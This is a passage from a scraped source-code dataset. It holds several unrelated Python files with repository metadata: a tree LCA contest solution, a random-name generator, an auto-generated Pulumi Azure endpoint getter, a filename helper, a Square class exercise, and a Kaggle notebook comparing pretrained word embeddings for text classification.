] | k.tanvir.hossain@gmail.com |
c5708367337a0c64f2df12dcce951050022001b6 | 2af1e6357f51d0d08b1a991e2bd922b7bdc8c0b6 | /baekjoon/accepted/15480 LCA์ ์ฟผ๋ฆฌ.py | 8220d3407e8cfb7390cba36119d50b67d795abeb | [] | no_license | grasshopperTrainer/coding_practice | 530e9912b10952c866d35d69f12c99b96959a22d | d1e5e6d6fa3f71f1a0105940fff1785068aec8b0 | refs/heads/master | 2023-06-01T13:30:15.362657 | 2021-06-08T08:40:15 | 2021-06-08T08:40:15 | 267,359,225 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,998 | py | # not accepted
from sys import stdin
from collections import deque
def solution(N, edges, asked):
    """Answer rooted lowest-common-ancestor queries on a tree of N nodes.

    edges is an undirected edge list over nodes 1..N; each query
    (root, a, b) asks for the LCA of a and b when the tree is rooted at
    *root*.  A parent/depth table (BFS) and a binary-lifting ancestor
    table are rebuilt per query.

    Returns the list of LCA answers in query order.

    Fix: a leftover debug print inside the lifting loop has been removed --
    it interleaved diagnostics with the judged output.
    """
    # Adjacency list of the undirected tree.
    nd_tree = {}
    for a, b in edges:
        nd_tree.setdefault(a, []).append(b)
        nd_tree.setdefault(b, []).append(a)

    answers = []
    for root, a, b in asked:
        # BFS from the query's root: parent pointer and depth per node.
        tree = [i for i in range(N+1)]
        node_depth = [0 for _ in range(N+1)]
        max_depth = 0
        que = deque([[root, 0]])
        visited = {root}
        while que:
            at, depth = que.popleft()
            max_depth = max((max_depth, depth))
            for goto in nd_tree[at]:
                if goto not in visited:
                    visited.add(goto)
                    tree[goto] = at
                    node_depth[goto] = depth+1
                    que.append((goto, depth+1))

        # Binary-lifting table: lca[v][k] is v's 2**k-th ancestor
        # (saturating at the root).
        ancestry_d = len(bin(max_depth)[2:])+1
        lca = [[root for _ in range(ancestry_d)] for _ in range(N+1)]
        for node in range(1, N+1):
            for anc in range(ancestry_d):
                if anc == 0:
                    lca[node][anc] = tree[node]
                else:
                    lca[node][anc] = lca[lca[node][anc-1]][anc-1]

        # Lift the deeper node until both sit at the same depth.
        while node_depth[a] != node_depth[b]:
            if node_depth[a] > node_depth[b]:
                a = tree[a]
            else:
                b = tree[b]
        # Jump both nodes upward until they meet; the meeting node is the LCA.
        # NOTE(review): lca[a][anc+1] can index past ancestry_d on deep
        # trees -- the header marks this submission "not accepted"; verify.
        while a != b:
            anc = 0
            while lca[a][anc+1] != lca[b][anc+1]:
                anc += 1
            a, b = lca[a][anc], lca[b][anc]
        answers.append(a)
    return answers
# stdin driver: read N, then N-1 edges, then M queries (root a b), and
# print one LCA answer per line.
N = int(stdin.readline())
edges = []
for _ in range(N-1):
    edges.append([int(c) for c in stdin.readline().strip().split(' ')])
M = int(stdin.readline())
asked = []
for _ in range(M):
    asked.append([int(c) for c in stdin.readline().strip().split(' ')])
for a in solution(N, edges, asked):
    print(a)
| [
"grasshoppertrainer@gmail.com"
] | grasshoppertrainer@gmail.com |
6e8ca6ecd6885f3d1ee5325ac3f14d28d72a062b | c4f25e2a5b444492e86b4f1523e930a1ec780c49 | /character/names/__init__.py | 9987b708059225b3efdea6d5c4c58428cff5df38 | [] | no_license | steliosph/stevooLand | 155b8d64d0bbbf829050a006224586d39baed9d3 | 2c86c6f01df1c8e1d59db1fc1d619071d7607737 | refs/heads/master | 2019-08-06T22:35:08.776479 | 2017-10-01T10:38:12 | 2017-10-01T10:38:12 | 105,182,951 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 983 | py | from __future__ import unicode_literals
from os.path import abspath, join, dirname
import random
# Package metadata.
__title__ = 'names'
__version__ = '0.3.0.post1'
__author__ = 'Trey Hunner'
__license__ = 'MIT'


def full_path(filename):
    """Return *filename* resolved relative to this package's directory."""
    # A def instead of the original assigned lambda (PEP 8 E731);
    # behaviour is unchanged.
    return abspath(join(dirname(__file__), filename))


# Name-frequency data files bundled with the package, keyed by
# "<field>:<gender>".
FILES = {
    'first:male': full_path('dist.male.first'),
    'first:female': full_path('dist.female.first'),
}
def __get_name(filename):
    """Draw one name from a cumulative-frequency file, or '' if it is empty.

    Each data row is: name, frequency, cumulative frequency, rank.  A random
    threshold is drawn and the first name whose cumulative frequency exceeds
    it is returned, so common names are picked proportionally more often.
    """
    # Cumulative values in the bundled files top out around 90,
    # hence the scaling factor.
    threshold = random.random() * 90
    with open(filename) as handle:
        for row in handle:
            name, _, cumulative, _ = row.split()
            if float(cumulative) > threshold:
                return name
    return ""  # Return empty string if file is empty
def get_first_name(gender=None):
    """Return a random capitalized first name.

    gender may be 'male', 'female', or None (a coin-flip between the two).
    Raises ValueError for any other value.
    """
    gender = random.choice(('male', 'female')) if gender is None else gender
    if gender not in ('male', 'female'):
        raise ValueError("Only 'male' and 'female' are supported as gender")
    return __get_name(FILES['first:%s' % gender]).capitalize()
"stevoo82@gmail.com"
] | stevoo82@gmail.com |
6a3307afb49fd8cb535570b49aaeafc631f3394b | 90419da201cd4948a27d3612f0b482c68026c96f | /sdk/python/pulumi_azure_nextgen/network/v20170301/get_endpoint.py | 7e85c2b2da6288d9cba3d474eec4981e754e7d0c | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | test-wiz-sec/pulumi-azure-nextgen | cd4bee5d70cb0d332c04f16bb54e17d016d2adaf | 20a695af0d020b34b0f1c336e1b69702755174cc | refs/heads/master | 2023-06-08T02:35:52.639773 | 2020-11-06T22:39:06 | 2020-11-06T22:39:06 | 312,993,761 | 0 | 0 | Apache-2.0 | 2023-06-02T06:47:28 | 2020-11-15T09:04:00 | null | UTF-8 | Python | false | false | 8,850 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'GetEndpointResult',
'AwaitableGetEndpointResult',
'get_endpoint',
]
# Auto-generated by the Pulumi SDK Generator -- do not hand-edit; regenerate
# from the Azure API schema instead.
@pulumi.output_type
class GetEndpointResult:
    """
    Class representing a Traffic Manager endpoint.
    """
    def __init__(__self__, endpoint_location=None, endpoint_monitor_status=None, endpoint_status=None, geo_mapping=None, min_child_endpoints=None, name=None, priority=None, target=None, target_resource_id=None, type=None, weight=None):
        # Each field is type-checked only when truthy, then stored through
        # pulumi.set so the @pulumi.getter properties can retrieve it.
        if endpoint_location and not isinstance(endpoint_location, str):
            raise TypeError("Expected argument 'endpoint_location' to be a str")
        pulumi.set(__self__, "endpoint_location", endpoint_location)
        if endpoint_monitor_status and not isinstance(endpoint_monitor_status, str):
            raise TypeError("Expected argument 'endpoint_monitor_status' to be a str")
        pulumi.set(__self__, "endpoint_monitor_status", endpoint_monitor_status)
        if endpoint_status and not isinstance(endpoint_status, str):
            raise TypeError("Expected argument 'endpoint_status' to be a str")
        pulumi.set(__self__, "endpoint_status", endpoint_status)
        if geo_mapping and not isinstance(geo_mapping, list):
            raise TypeError("Expected argument 'geo_mapping' to be a list")
        pulumi.set(__self__, "geo_mapping", geo_mapping)
        if min_child_endpoints and not isinstance(min_child_endpoints, int):
            raise TypeError("Expected argument 'min_child_endpoints' to be a int")
        pulumi.set(__self__, "min_child_endpoints", min_child_endpoints)
        if name and not isinstance(name, str):
            raise TypeError("Expected argument 'name' to be a str")
        pulumi.set(__self__, "name", name)
        if priority and not isinstance(priority, int):
            raise TypeError("Expected argument 'priority' to be a int")
        pulumi.set(__self__, "priority", priority)
        if target and not isinstance(target, str):
            raise TypeError("Expected argument 'target' to be a str")
        pulumi.set(__self__, "target", target)
        if target_resource_id and not isinstance(target_resource_id, str):
            raise TypeError("Expected argument 'target_resource_id' to be a str")
        pulumi.set(__self__, "target_resource_id", target_resource_id)
        if type and not isinstance(type, str):
            raise TypeError("Expected argument 'type' to be a str")
        pulumi.set(__self__, "type", type)
        if weight and not isinstance(weight, int):
            raise TypeError("Expected argument 'weight' to be a int")
        pulumi.set(__self__, "weight", weight)

    @property
    @pulumi.getter(name="endpointLocation")
    def endpoint_location(self) -> Optional[str]:
        """
        Specifies the location of the external or nested endpoints when using the ‘Performance’ traffic routing method.
        """
        return pulumi.get(self, "endpoint_location")

    @property
    @pulumi.getter(name="endpointMonitorStatus")
    def endpoint_monitor_status(self) -> Optional[str]:
        """
        Gets or sets the monitoring status of the endpoint.
        """
        return pulumi.get(self, "endpoint_monitor_status")

    @property
    @pulumi.getter(name="endpointStatus")
    def endpoint_status(self) -> Optional[str]:
        """
        Gets or sets the status of the endpoint.. If the endpoint is Enabled, it is probed for endpoint health and is included in the traffic routing method. Possible values are 'Enabled' and 'Disabled'.
        """
        return pulumi.get(self, "endpoint_status")

    @property
    @pulumi.getter(name="geoMapping")
    def geo_mapping(self) -> Optional[Sequence[str]]:
        """
        Gets or sets the list of countries/regions mapped to this endpoint when using the ‘Geographic’ traffic routing method. Please consult Traffic Manager Geographic documentation for a full list of accepted values.
        """
        return pulumi.get(self, "geo_mapping")

    @property
    @pulumi.getter(name="minChildEndpoints")
    def min_child_endpoints(self) -> Optional[int]:
        """
        Gets or sets the minimum number of endpoints that must be available in the child profile in order for the parent profile to be considered available. Only applicable to endpoint of type 'NestedEndpoints'.
        """
        return pulumi.get(self, "min_child_endpoints")

    @property
    @pulumi.getter
    def name(self) -> Optional[str]:
        """
        Gets or sets the name of the Traffic Manager endpoint.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def priority(self) -> Optional[int]:
        """
        Gets or sets the priority of this endpoint when using the ‘Priority’ traffic routing method. Possible values are from 1 to 1000, lower values represent higher priority. This is an optional parameter.  If specified, it must be specified on all endpoints, and no two endpoints can share the same priority value.
        """
        return pulumi.get(self, "priority")

    @property
    @pulumi.getter
    def target(self) -> Optional[str]:
        """
        Gets or sets the fully-qualified DNS name of the endpoint.  Traffic Manager returns this value in DNS responses to direct traffic to this endpoint.
        """
        return pulumi.get(self, "target")

    @property
    @pulumi.getter(name="targetResourceId")
    def target_resource_id(self) -> Optional[str]:
        """
        Gets or sets the Azure Resource URI of the endpoint. Not applicable to endpoints of type 'ExternalEndpoints'.
        """
        return pulumi.get(self, "target_resource_id")

    @property
    @pulumi.getter
    def type(self) -> Optional[str]:
        """
        Gets or sets the endpoint type of the Traffic Manager endpoint.
        """
        return pulumi.get(self, "type")

    @property
    @pulumi.getter
    def weight(self) -> Optional[int]:
        """
        Gets or sets the weight of this endpoint when using the 'Weighted' traffic routing method. Possible values are from 1 to 1000.
        """
        return pulumi.get(self, "weight")
class AwaitableGetEndpointResult(GetEndpointResult):
    # Awaitable wrapper generated by the Pulumi SDK Generator: __await__
    # yields nothing (the `if False` keeps it a generator) and immediately
    # returns a plain GetEndpointResult copy of this object's fields.
    # pylint: disable=using-constant-test
    def __await__(self):
        if False:
            yield self
        return GetEndpointResult(
            endpoint_location=self.endpoint_location,
            endpoint_monitor_status=self.endpoint_monitor_status,
            endpoint_status=self.endpoint_status,
            geo_mapping=self.geo_mapping,
            min_child_endpoints=self.min_child_endpoints,
            name=self.name,
            priority=self.priority,
            target=self.target,
            target_resource_id=self.target_resource_id,
            type=self.type,
            weight=self.weight)
def get_endpoint(endpoint_name: Optional[str] = None,
                 endpoint_type: Optional[str] = None,
                 profile_name: Optional[str] = None,
                 resource_group_name: Optional[str] = None,
                 opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetEndpointResult:
    """
    Gets a Traffic Manager endpoint via the Azure NextGen provider
    (network API version 2017-03-01).

    :param str endpoint_name: The name of the Traffic Manager endpoint.
    :param str endpoint_type: The type of the Traffic Manager endpoint.
    :param str profile_name: The name of the Traffic Manager profile.
    :param str resource_group_name: The name of the resource group containing the Traffic Manager endpoint.
    """
    __args__ = dict()
    __args__['endpointName'] = endpoint_name
    __args__['endpointType'] = endpoint_type
    __args__['profileName'] = profile_name
    __args__['resourceGroupName'] = resource_group_name
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        opts.version = _utilities.get_version()
    # Invoke the provider function and re-wrap the raw result as the
    # awaitable typed output object.
    __ret__ = pulumi.runtime.invoke('azure-nextgen:network/v20170301:getEndpoint', __args__, opts=opts, typ=GetEndpointResult).value

    return AwaitableGetEndpointResult(
        endpoint_location=__ret__.endpoint_location,
        endpoint_monitor_status=__ret__.endpoint_monitor_status,
        endpoint_status=__ret__.endpoint_status,
        geo_mapping=__ret__.geo_mapping,
        min_child_endpoints=__ret__.min_child_endpoints,
        name=__ret__.name,
        priority=__ret__.priority,
        target=__ret__.target,
        target_resource_id=__ret__.target_resource_id,
        type=__ret__.type,
        weight=__ret__.weight)
"public@paulstack.co.uk"
] | public@paulstack.co.uk |
b4b1689cbc5129bc32113f9e26db59be3cc3da36 | 6b420371022986d850a8f8d88fc853aa5ca0ad9b | /modules/filenamegen.py | 4087919e00d45f89d4ac81b998279ee0010201d1 | [] | no_license | jiamh2005/persons | 7d4a1c5b2dc33309afa2b68cb8063d3319945f7c | 1a90bf616174cf32b116998d10eb285ec3639040 | refs/heads/master | 2021-04-03T07:41:14.099193 | 2018-03-28T13:09:51 | 2018-03-28T13:09:51 | 124,366,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,036 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import time
import random
# Alphabet of candidate characters: upper/lower-case letters and digits (62).
x = "AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789"


def singlerandom(number):
    """Return a random string of *number* distinct characters drawn from x.

    random.sample picks without replacement, so number must be <= 62.
    The original also stripped spaces from the result, but x contains no
    spaces -- that dead .replace(' ', '') call has been dropped.
    """
    return ''.join(random.sample(x, number))
def nsfile(s):
    """Return a list of *s* generated file names.

    Each name is the 14-digit local timestamp (YYYYMMDDHHMMSS) followed by
    6 random alphanumeric characters from singlerandom.
    """
    generated = []
    for _ in range(s):
        stamp = time.strftime("%Y%m%d%H%M%S", time.localtime())
        suffix = singlerandom(6)
        generated.append(stamp + suffix)
    return generated
def file_extension(path):
    """Return the extension of *path*, including the leading dot."""
    _, extension = os.path.splitext(path)
    return extension
def file_dir(path):
    """Return the directory part of *path*; backslashes become '/' first."""
    normalised = path.replace("\\", "/")
    head, _ = os.path.split(normalised)
    return head
def file_name(path):
    """Return the base name of *path* without its extension."""
    base = os.path.split(path)[1]
    stem, _ = os.path.splitext(base)
    return stem
if __name__ == '__main__':
    # NOTE: Python 2 syntax (print statement; input() evaluates the typed
    # expression) -- this guard does not run under Python 3.
    s = input("Please input number of files:")
    print nsfile(s)
| [
"jia@jiamh.cc"
] | jia@jiamh.cc |
92b960bbcd5dbc151aed6c4a93722c1f83d4615b | 59da6bb7222335e96bcaf2acce4e94bb28064f90 | /0x06-python-classes/101-square.py | 6cfde765ab9f73e7db6d6edcfffdb344f740536a | [] | no_license | cmdelcarmen/holbertonschool-higher_level_programming | 249fa4c5447f5fb88c81ba362a8cf45a01a65d39 | d8dd707559dacabf93453233861bef7c2f54d184 | refs/heads/main | 2023-08-19T07:39:51.777899 | 2021-09-23T01:27:28 | 2021-09-23T01:27:28 | 361,834,373 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 734 | py | #!/usr/bin/python3
class Square:
    """Square defined by a size and a printing position (101-square task).

    position is an (x, y) tuple: x spaces indent each printed row and y
    newlines precede the square.
    """

    def __init__(self, size=0, position=(0, 0)):
        """Initialise the square; values are validated by the setters."""
        self.size = size
        self.position = position

    @property
    def size(self):
        """Edge length of the square."""
        return self.__size

    @size.setter
    def size(self, value):
        """Set the size; must be an int >= 0 (the original never checked)."""
        if not isinstance(value, int):
            raise TypeError("size must be an integer")
        if value < 0:
            raise ValueError("size must be >= 0")
        self.__size = value

    @property
    def position(self):
        """(x, y) offset used by my_print."""
        return self.__position

    @position.setter
    def position(self, value):
        """Set the position; must be a tuple of 2 non-negative integers."""
        if (not isinstance(value, tuple) or len(value) != 2
                or not all(isinstance(n, int) for n in value)
                or not all(n >= 0 for n in value)):
            raise TypeError("position must be a tuple of 2 positive integers")
        self.__position = value

    def area(self):
        """Return the area (size squared)."""
        return self.__size ** 2

    def my_print(self):
        """Print the square with '#', honouring position.

        Prints an empty line when size is 0.  (The original left this
        method as a bare ``pass`` stub.)
        """
        if self.__size == 0:
            print("")
            return
        print("\n" * self.__position[1], end="")
        for _ in range(self.__size):
            print(" " * self.__position[0] + "#" * self.__size)
"delcarmencaroline@gmail.com"
] | delcarmencaroline@gmail.com |
e048837fa12f55157f9452e0736edb9ff1bd7cf7 | eeb7e70b0b68decbdcb32682351e54e0be99a5b0 | /kaggle/python_files/sample904.py | 82ab437aca033f7a777414cf29125f255fb92898 | [] | no_license | SocioProphet/CodeGraph | 8bafd7f03204f20da8f54ab23b04f3844e6d24de | 215ac4d16d21d07e87964fe9a97a5bf36f4c7d64 | refs/heads/master | 2023-02-16T02:51:27.791886 | 2021-01-15T07:00:41 | 2021-01-15T07:00:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,371 | py | #!/usr/bin/env python
# coding: utf-8
# **Notebook Objective:**
#
# Objective of the notebook is to look at the different pretrained embeddings provided in the dataset and to see how they are useful in the model building process.
#
# First let us import the necessary modules and read the input data.
# In[ ]:
import os
import time
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from tqdm import tqdm
import math
from sklearn.model_selection import train_test_split
from sklearn import metrics
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.layers import Dense, Input, LSTM, Embedding, Dropout, Activation, CuDNNGRU, Conv1D
from keras.layers import Bidirectional, GlobalMaxPool1D
from keras.models import Model
from keras import initializers, regularizers, constraints, optimizers, layers
# In[ ]:
# Load the Quora Insincere Questions train/test sets from the Kaggle
# input directory and report their dimensions.
train_df = pd.read_csv("../input/train.csv")
test_df = pd.read_csv("../input/test.csv")
print("Train shape : ",train_df.shape)
print("Test shape : ",test_df.shape)
# Next steps are as follows:
# * Split the training dataset into train and val sample. Cross validation is a time consuming process and so let us do simple train val split.
# * Fill up the missing values in the text column with '_na_'
# * Tokenize the text column and convert them to vector sequences
# * Pad the sequence as needed - if the number of words in the text is greater than 'max_len' trunacate them to 'max_len' or if the number of words in the text is lesser than 'max_len' add zeros for remaining values.
# In[ ]:
## split to train and val
# 90/10 split; the fixed seed keeps the validation sample reproducible
# across the runs that follow.
train_df, val_df = train_test_split(train_df, test_size=0.1, random_state=2018)
## some config values
embed_size = 300 # how big is each word vector
max_features = 50000 # how many unique words to use (i.e num rows in embedding vector)
maxlen = 100 # max number of words in a question to use
## fill up the missing values
train_X = train_df["question_text"].fillna("_na_").values
val_X = val_df["question_text"].fillna("_na_").values
test_X = test_df["question_text"].fillna("_na_").values
## Tokenize the sentences
# The tokenizer vocabulary is fit on the training split only; val/test are
# mapped with the same word index so ids stay consistent.
tokenizer = Tokenizer(num_words=max_features)
tokenizer.fit_on_texts(list(train_X))
train_X = tokenizer.texts_to_sequences(train_X)
val_X = tokenizer.texts_to_sequences(val_X)
test_X = tokenizer.texts_to_sequences(test_X)
## Pad the sentences
# Pads (or truncates) every sequence to exactly `maxlen` ids.
train_X = pad_sequences(train_X, maxlen=maxlen)
val_X = pad_sequences(val_X, maxlen=maxlen)
test_X = pad_sequences(test_X, maxlen=maxlen)
## Get the target values
train_y = train_df['target'].values
val_y = val_df['target'].values
# **Without Pretrained Embeddings:**
#
# Now that we are done with all the necessary preprocessing steps, we can first train a Bidirectional GRU model. We will not use any pre-trained word embeddings for this model and the embeddings will be learnt from scratch. Please check out the model summary for the details of the layers used.
# In[ ]:
# Baseline: bidirectional GRU with an embedding layer learned from scratch
# (no pre-trained vectors), max-pooled and fed through a small dense head.
inp = Input(shape=(maxlen,))
x = Embedding(max_features, embed_size)(inp)
x = Bidirectional(CuDNNGRU(64, return_sequences=True))(x)
x = GlobalMaxPool1D()(x)
x = Dense(16, activation="relu")(x)
x = Dropout(0.1)(x)
x = Dense(1, activation="sigmoid")(x)
model = Model(inputs=inp, outputs=x)
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
print(model.summary())
# Train the model using train sample and monitor the metric on the valid sample. This is just a sample model running for 2 epochs. Changing the epochs, batch_size and model parameters might give us a better model.
# In[ ]:
## Train the model
model.fit(train_X, train_y, batch_size=512, epochs=2, validation_data=(val_X, val_y))
# Now let us get the validation sample predictions and also get the best threshold for F1 score.
# In[ ]:
pred_noemb_val_y = model.predict([val_X], batch_size=1024, verbose=1)
# Scan candidate decision thresholds in [0.10, 0.50] and report F1 at each.
for thresh in np.arange(0.1, 0.501, 0.01):
    thresh = np.round(thresh, 2)
    print("F1 score at threshold {0} is {1}".format(thresh, metrics.f1_score(val_y, (pred_noemb_val_y>thresh).astype(int))))
# Now let us get the test set predictions as well and save them
# In[ ]:
pred_noemb_test_y = model.predict([test_X], batch_size=1024, verbose=1)
# Now that our model building is done, it might be a good idea to clean up some memory before we go to the next step.
# In[ ]:
del model, inp, x
import gc; gc.collect()
time.sleep(10)
# So we got some baseline GRU model without pre-trained embeddings. Now let us use the provided embeddings and rebuild the model again to see the performance.
#
#
# In[ ]:
# We have four different types of embeddings.
# * GoogleNews-vectors-negative300 - https://code.google.com/archive/p/word2vec/
# * glove.840B.300d - https://nlp.stanford.edu/projects/glove/
# * paragram_300_sl999 - https://cogcomp.org/page/resource_view/106
# * wiki-news-300d-1M - https://fasttext.cc/docs/en/english-vectors.html
#
# A very good explanation for different types of embeddings are given in this [kernel](https://www.kaggle.com/sbongo/do-pretrained-embeddings-give-you-the-extra-edge). Please refer the same for more details..
#
# **Glove Embeddings:**
#
# In this section, let us use the Glove embeddings and rebuild the GRU model.
# In[ ]:
# GloVe section: load pre-trained vectors, build the embedding matrix and
# retrain the same BiGRU architecture on top of it.
EMBEDDING_FILE = '../input/embeddings/glove.840B.300d/glove.840B.300d.txt'
def get_coefs(word,*arr): return word, np.asarray(arr, dtype='float32')
# Map every token in the GloVe file to its 300-d vector.
embeddings_index = dict(get_coefs(*o.split(" ")) for o in open(EMBEDDING_FILE))
all_embs = np.stack(embeddings_index.values())
emb_mean,emb_std = all_embs.mean(), all_embs.std()
embed_size = all_embs.shape[1]
word_index = tokenizer.word_index
# BUGFIX: Tokenizer's word_index is 1-based, so valid ids run up to
# len(word_index); the matrix needs one extra row (index 0 = padding).
# The old `min(max_features, len(word_index))` under-sized the matrix and
# raised IndexError whenever the vocabulary was smaller than max_features.
nb_words = min(max_features, len(word_index) + 1)
# Rows default to draws from the empirical N(mean, std) of the embeddings
# so out-of-vocabulary words get plausible random vectors.
embedding_matrix = np.random.normal(emb_mean, emb_std, (nb_words, embed_size))
for word, i in word_index.items():
    # BUGFIX: bound by nb_words (the matrix height), not max_features.
    if i >= nb_words: continue
    embedding_vector = embeddings_index.get(word)
    if embedding_vector is not None: embedding_matrix[i] = embedding_vector
inp = Input(shape=(maxlen,))
# BUGFIX: input_dim must equal embedding_matrix.shape[0]; passing
# max_features crashed the weight load when the vocabulary was smaller.
x = Embedding(nb_words, embed_size, weights=[embedding_matrix])(inp)
x = Bidirectional(CuDNNGRU(64, return_sequences=True))(x)
x = GlobalMaxPool1D()(x)
x = Dense(16, activation="relu")(x)
x = Dropout(0.1)(x)
x = Dense(1, activation="sigmoid")(x)
model = Model(inputs=inp, outputs=x)
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
print(model.summary())
# In[ ]:
model.fit(train_X, train_y, batch_size=512, epochs=2, validation_data=(val_X, val_y))
# In[ ]:
pred_glove_val_y = model.predict([val_X], batch_size=1024, verbose=1)
# Threshold sweep for the best validation F1.
for thresh in np.arange(0.1, 0.501, 0.01):
    thresh = np.round(thresh, 2)
    print("F1 score at threshold {0} is {1}".format(thresh, metrics.f1_score(val_y, (pred_glove_val_y>thresh).astype(int))))
# Results seem to be better than the model without pretrained embeddings.
# In[ ]:
pred_glove_test_y = model.predict([test_X], batch_size=1024, verbose=1)
# In[ ]:
# Free the large embedding objects before loading the next embedding file.
del word_index, embeddings_index, all_embs, embedding_matrix, model, inp, x
import gc; gc.collect()
time.sleep(10)
# **Wiki News FastText Embeddings:**
#
# Now let us use the FastText embeddings trained on Wiki News corpus in place of Glove embeddings and rebuild the model.
# In[ ]:
# FastText (wiki-news) section: same pipeline as the GloVe section but with
# the FastText vectors; short header lines are filtered out via len(o)>100.
EMBEDDING_FILE = '../input/embeddings/wiki-news-300d-1M/wiki-news-300d-1M.vec'
def get_coefs(word,*arr): return word, np.asarray(arr, dtype='float32')
embeddings_index = dict(get_coefs(*o.split(" ")) for o in open(EMBEDDING_FILE) if len(o)>100)
all_embs = np.stack(embeddings_index.values())
emb_mean,emb_std = all_embs.mean(), all_embs.std()
embed_size = all_embs.shape[1]
word_index = tokenizer.word_index
# BUGFIX: word_index is 1-based (0 is padding), so the matrix needs
# len(word_index) + 1 rows when the vocabulary is below max_features;
# the old bound caused IndexError / weight-shape mismatches in that case.
nb_words = min(max_features, len(word_index) + 1)
embedding_matrix = np.random.normal(emb_mean, emb_std, (nb_words, embed_size))
for word, i in word_index.items():
    # BUGFIX: bound by the actual matrix height, not max_features.
    if i >= nb_words: continue
    embedding_vector = embeddings_index.get(word)
    if embedding_vector is not None: embedding_matrix[i] = embedding_vector
inp = Input(shape=(maxlen,))
# BUGFIX: input_dim matches embedding_matrix.shape[0].
x = Embedding(nb_words, embed_size, weights=[embedding_matrix])(inp)
x = Bidirectional(CuDNNGRU(64, return_sequences=True))(x)
x = GlobalMaxPool1D()(x)
x = Dense(16, activation="relu")(x)
x = Dropout(0.1)(x)
x = Dense(1, activation="sigmoid")(x)
model = Model(inputs=inp, outputs=x)
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# In[ ]:
model.fit(train_X, train_y, batch_size=512, epochs=2, validation_data=(val_X, val_y))
# In[ ]:
pred_fasttext_val_y = model.predict([val_X], batch_size=1024, verbose=1)
# Threshold sweep for the best validation F1.
for thresh in np.arange(0.1, 0.501, 0.01):
    thresh = np.round(thresh, 2)
    print("F1 score at threshold {0} is {1}".format(thresh, metrics.f1_score(val_y, (pred_fasttext_val_y>thresh).astype(int))))
# In[ ]:
pred_fasttext_test_y = model.predict([test_X], batch_size=1024, verbose=1)
# In[ ]:
# Free the large embedding objects before loading the next embedding file.
del word_index, embeddings_index, all_embs, embedding_matrix, model, inp, x
import gc; gc.collect()
time.sleep(10)
# **Paragram Embeddings:**
#
# In this section, we can use the paragram embeddings and build the model and make predictions.
# In[ ]:
# Paragram section: same pipeline again; the file is latin-ish text so it is
# opened with utf8 + errors ignored, and short lines are filtered out.
EMBEDDING_FILE = '../input/embeddings/paragram_300_sl999/paragram_300_sl999.txt'
def get_coefs(word,*arr): return word, np.asarray(arr, dtype='float32')
embeddings_index = dict(get_coefs(*o.split(" ")) for o in open(EMBEDDING_FILE, encoding="utf8", errors='ignore') if len(o)>100)
all_embs = np.stack(embeddings_index.values())
emb_mean,emb_std = all_embs.mean(), all_embs.std()
embed_size = all_embs.shape[1]
word_index = tokenizer.word_index
# BUGFIX: word_index is 1-based (0 is padding), so the matrix needs
# len(word_index) + 1 rows when the vocabulary is below max_features;
# the old bound caused IndexError / weight-shape mismatches in that case.
nb_words = min(max_features, len(word_index) + 1)
embedding_matrix = np.random.normal(emb_mean, emb_std, (nb_words, embed_size))
for word, i in word_index.items():
    # BUGFIX: bound by the actual matrix height, not max_features.
    if i >= nb_words: continue
    embedding_vector = embeddings_index.get(word)
    if embedding_vector is not None: embedding_matrix[i] = embedding_vector
inp = Input(shape=(maxlen,))
# BUGFIX: input_dim matches embedding_matrix.shape[0].
x = Embedding(nb_words, embed_size, weights=[embedding_matrix])(inp)
x = Bidirectional(CuDNNGRU(64, return_sequences=True))(x)
x = GlobalMaxPool1D()(x)
x = Dense(16, activation="relu")(x)
x = Dropout(0.1)(x)
x = Dense(1, activation="sigmoid")(x)
model = Model(inputs=inp, outputs=x)
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# In[ ]:
model.fit(train_X, train_y, batch_size=512, epochs=2, validation_data=(val_X, val_y))
# In[ ]:
pred_paragram_val_y = model.predict([val_X], batch_size=1024, verbose=1)
# Threshold sweep for the best validation F1.
for thresh in np.arange(0.1, 0.501, 0.01):
    thresh = np.round(thresh, 2)
    print("F1 score at threshold {0} is {1}".format(thresh, metrics.f1_score(val_y, (pred_paragram_val_y>thresh).astype(int))))
# In[ ]:
pred_paragram_test_y = model.predict([test_X], batch_size=1024, verbose=1)
# In[ ]:
# Free the large embedding objects before the final blending step.
del word_index, embeddings_index, all_embs, embedding_matrix, model, inp, x
import gc; gc.collect()
time.sleep(10)
# **Observations:**
# * Overall pretrained embeddings seem to give better results comapred to non-pretrained model.
# * The performance of the different pretrained embeddings are almost similar.
#
# **Final Blend:**
#
# Though the results of the models with different pre-trained embeddings are similar, there is a good chance that they might capture different type of information from the data. So let us do a blend of these three models by averaging their predictions.
# In[ ]:
# Blend the three pre-trained-embedding models with a simple weighted
# average (weights sum to 1.0) and re-run the threshold sweep on it.
pred_val_y = 0.33*pred_glove_val_y + 0.33*pred_fasttext_val_y + 0.34*pred_paragram_val_y
for thresh in np.arange(0.1, 0.501, 0.01):
    thresh = np.round(thresh, 2)
    print("F1 score at threshold {0} is {1}".format(thresh, metrics.f1_score(val_y, (pred_val_y>thresh).astype(int))))
# The result seems to better than individual pre-trained models and so we let us create a submission file using this model blend.
# In[ ]:
pred_test_y = 0.33*pred_glove_test_y + 0.33*pred_fasttext_test_y + 0.34*pred_paragram_test_y
# Binarize at 0.35 (chosen from the validation sweep above) and write the
# Kaggle submission file.
